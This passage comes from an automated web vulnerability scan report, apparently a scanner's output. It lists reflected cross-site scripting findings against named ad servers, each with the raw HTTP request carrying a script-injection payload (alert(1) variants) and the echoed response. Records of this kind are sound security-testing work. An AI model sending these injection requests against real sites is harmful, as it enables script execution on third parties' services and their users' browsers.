Referer: http://ad.yieldmanager.com/iframe3?.s1hAPQwCgD01TAAAAAAAK2gDQAAAAAAAgAQAAIAAAAAAP8AAAABFWJSEwAAAAAAY04TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWOwUAAAAAAAIAAgAAAAAAmpmZmZmZ8T-amZmZmZnxP5qZmZmZmfE.mpmZmZmZ8T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADacgV4OXmhCUlS6anFfIVdJbtK4S9KioraJLUCAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D300x250%26s%3D667892%26r%3D1%26_salt%3D1162597115%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,f4e74ee2-37e2-11e0-a10f-001b24783b3e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:34:56 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 02:34:56 GMT
Pragma: no-cache
Content-Length: 4648
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9ea33"-alert(1)-"3b4b2d0d84c=1&Z=300x250&s=1570312&_salt=2802567516";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...

1.54. http://ads.specificmedia.com/serve/v=5 [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.specificmedia.com
Path:	/serve/v=5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b714e'-alert(1)-'2181d872488 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=2;l=5434;cxt=99002376:2166629-99002135:2165456-99013532:2161575;kw=;ts=187841;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0b714e'-alert(1)-'2181d872488 HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=250&slotname=5334629240&w=300&lmt=1297666157&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297647258512&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647258544&frm=0&adk=473711736&ga_vid=1491658047.1297647259&ga_sid=1297647259&ga_hid=1857945157&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&eid=30143103&fu=0&ifi=1&dtd=95&xpc=y4g04mCIiz&p=http%3A//www.drudgereport.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5008.928757113086138685

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:33:44 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5007.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 19-Jan-2016 01:33:44 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 386
Expires: Sun, 13 Feb 2011 01:33:44 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=124229;b=785339;ts=20110213203344;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0b714e'-alert(1)-'2181d872488;cxt=99002376:2166629-99002135:2165456-99013532:2161575" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

1.55. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.specificmedia.com
Path:	/serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc57b'-alert(1)-'40972d271a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=2;l=5434;cxt=99002376:2166629-99002135:2165456-99013532:2161575;kw=;ts=187841;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0&bc57b'-alert(1)-'40972d271a2=1 HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=250&slotname=5334629240&w=300&lmt=1297666157&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297647258512&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647258544&frm=0&adk=473711736&ga_vid=1491658047.1297647259&ga_sid=1297647259&ga_hid=1857945157&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&eid=30143103&fu=0&ifi=1&dtd=95&xpc=y4g04mCIiz&p=http%3A//www.drudgereport.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5008.928757113086138685

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:33:44 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5007.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 19-Jan-2016 01:33:45 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 389
Expires: Sun, 13 Feb 2011 01:33:45 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=124229;b=785339;ts=20110213203344;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0&bc57b'-alert(1)-'40972d271a2=1;cxt=99002376:2166629-99002135:2165456-99013532:2161575" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

1.56. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of the AdId request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload ab782><script>alert(1)</script>6e76889d9da was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blankab782><script>alert(1)</script>6e76889d9da HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 321

<html><body><base target=_blankab782><script>alert(1)</script>6e76889d9da><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7
...[SNIP]...

1.57. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of the AdId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25c14"><script>alert(1)</script>a4b96fa0e6e was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e;adiframe=y">
...[SNIP]...

1.58. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b69b0"><script>alert(1)</script>eeb789feb65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECHb69b0"><script>alert(1)</script>eeb789feb65;AdId=1343354;BnId=-1;;target=_blank HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 280

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECHb69b0"><script>alert(1)</script>eeb789feb65;AdId=1343354;BnId=-1;;target=_blank;adiframe=y">
...[SNIP]...

1.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 566fc><script>alert(1)</script>ed3badced5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&566fc><script>alert(1)</script>ed3badced5a=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 327

<html><body><base target=_blank&566fc><script>alert(1)</script>ed3badced5a=1><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C1
...[SNIP]...

1.60. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87299"><script>alert(1)</script>d8233ba9cbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 329

<html><body><base target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1;adiframe=y">
...[SNIP]...

1.61. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f2f4"><script>alert(1)</script>fe7203a0cd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe7f2f4"><script>alert(1)</script>fe7203a0cd3/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn7f2f4"><script>alert(1)</script>fe7203a0cd3/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.62. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a3c"><script>alert(1)</script>9ea027e7c9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0e3a3c"><script>alert(1)</script>9ea027e7c9b/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0e3a3c"><script>alert(1)</script>9ea027e7c9b/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.63. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3700"><script>alert(1)</script>c1d53990b82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235c3700"><script>alert(1)</script>c1d53990b82/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235c3700"><script>alert(1)</script>c1d53990b82/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.64. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aafad"><script>alert(1)</script>58e3214e0d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606aafad"><script>alert(1)</script>58e3214e0d4/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606aafad"><script>alert(1)</script>58e3214e0d4/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.65. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64130"><script>alert(1)</script>4aff41005f7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/064130"><script>alert(1)</script>4aff41005f7/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/064130"><script>alert(1)</script>4aff41005f7/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.66. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86bda"><script>alert(1)</script>f0041c3072b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/15486bda"><script>alert(1)</script>f0041c3072b/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/15486bda"><script>alert(1)</script>f0041c3072b/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.67. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fd55"><script>alert(1)</script>94b70172a07 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH9fd55"><script>alert(1)</script>94b70172a07;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
